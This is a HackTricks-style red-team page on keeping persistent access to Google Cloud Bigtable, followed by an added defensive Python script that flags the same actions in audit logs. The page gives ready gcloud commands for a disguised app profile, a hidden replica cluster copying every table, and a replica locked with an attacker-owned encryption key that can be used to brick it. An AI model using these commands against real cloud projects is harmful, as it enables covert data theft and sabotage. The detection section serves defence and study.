GCP - Bigtable Persistence
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Bigtable
For more information about Bigtable check:
Dedicated attacker App Profile
Permissions: bigtable.appProfiles.create, bigtable.appProfiles.update.
Create an app profile that routes traffic to your replica cluster and enable Data Boost so you never depend on provisioned nodes that defenders might notice.
Create stealth app profile
gcloud bigtable app-profiles create stealth-profile \
--instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
--row-affinity --description="internal batch"
gcloud bigtable app-profiles update stealth-profile \
--instance=<instance-id> --data-boost \
--data-boost-compute-billing-owner=HOST_PAYS
As long as this profile exists you can reconnect using fresh credentials that reference it.
Maintain your own replica cluster
Permissions: bigtable.clusters.create, bigtable.instances.update, bigtable.clusters.list.
Provision a minimal node-count cluster in a quiet region. Even if your client identities disappear, the cluster keeps a full copy of every table until defenders explicitly remove it.
Create replica cluster
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1
Keep an eye on it through gcloud bigtable clusters describe dark-clone --instance=<instance-id> so you can scale up instantly when you need to pull data.
Lock replication behind your own CMEK
Permissions: bigtable.clusters.create, cloudkms.cryptoKeyVersions.useToEncrypt on the attacker-owned key.
Bring your own KMS key when spinning up a clone. Without that key, Google cannot re-create or fail over the cluster, so blue teams must coordinate with you before touching it.
Create CMEK-protected cluster
gcloud bigtable clusters create cmek-clone \
--instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
--kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>
Rotate or disable the key in your project to instantly brick the replica (while still letting you turn it back on later).
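For defenders, all three techniques above go through the Bigtable Admin API and therefore leave Admin Activity audit log entries. The triage below is an added example, not part of the original page: it flags app-profile changes, Data Boost being enabled, clusters created outside approved zones, and clusters encrypted with a KMS key from another project. The log entries are constructed, and the request layout under protoPayload, the approved zone list and every example-* name are assumptions.

```python
PREFIX = "google.bigtable.admin.v2.BigtableInstanceAdmin."
APPROVED_ZONES = {"us-central1-a"}  # assumption: zones this org uses for Bigtable
INST = "projects/example-prod/instances/example-instance"  # constructed name

def project_of(name):
    """Project id from a 'projects/<id>/...' resource name, else None."""
    parts = name.split("/")
    return parts[1] if len(parts) > 1 and parts[0] == "projects" else None

def review(log):
    """Return (principal, operation, reason) findings for one audit entry."""
    p = log.get("protoPayload", {})
    method = p.get("methodName", "")
    if not method.startswith(PREFIX):
        return []
    op, req = method[len(PREFIX):], p.get("request", {})
    who = p.get("authenticationInfo", {}).get("principalEmail", "unknown")
    reasons = []
    if op in ("CreateAppProfile", "UpdateAppProfile"):
        reasons.append("app-profile-change")  # every routing change gets reviewed
        if "dataBoostIsolationReadOnly" in req.get("appProfile", {}):
            reasons.append("data-boost-enabled")
    elif op == "CreateCluster":
        cluster = req.get("cluster", {})
        if cluster.get("location", "").rsplit("/", 1)[-1] not in APPROVED_ZONES:
            reasons.append("unapproved-zone")
        key = cluster.get("encryptionConfig", {}).get("kmsKeyName", "")
        if key and project_of(key) != project_of(p.get("resourceName", "")):
            reasons.append("cmek-key-in-other-project")
    return [(who, op, r) for r in reasons]

def scan(entries):
    """Flatten the findings for a batch of entries."""
    return [f for e in entries for f in review(e)]

def make_entry(op, request, who="sa@example-prod.iam.gserviceaccount.com"):
    # Builds a constructed entry; the request layout is an assumption.
    return {"protoPayload": {"methodName": PREFIX + op, "resourceName": INST,
            "authenticationInfo": {"principalEmail": who}, "request": request}}

ZONE = "projects/example-prod/locations/"
SAMPLE = [  # constructed entries, not real logs
    make_entry("CreateAppProfile", {"appProfile": {"multiClusterRoutingUseAny": {}}}),
    make_entry("UpdateAppProfile", {"appProfile": {"dataBoostIsolationReadOnly":
                                    {"computeBillingOwner": "HOST_PAYS"}}}),
    make_entry("CreateCluster", {"cluster": {"location": ZONE + "us-west4-b"}}),
    make_entry("CreateCluster", {"cluster": {"location": ZONE + "us-central1-a",
        "encryptionConfig": {"kmsKeyName": "projects/example-other/locations/"
                             "us-central1/keyRings/example-ring/cryptoKeys/example-key"}}}),
    make_entry("CreateCluster", {"cluster": {"location": ZONE + "us-central1-a"}}),  # expected
    {"protoPayload": {"methodName": "storage.buckets.list"}},  # unrelated service
]
```

Calling scan(SAMPLE) returns five findings; the in-zone cluster without a foreign key and the unrelated entry produce none.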

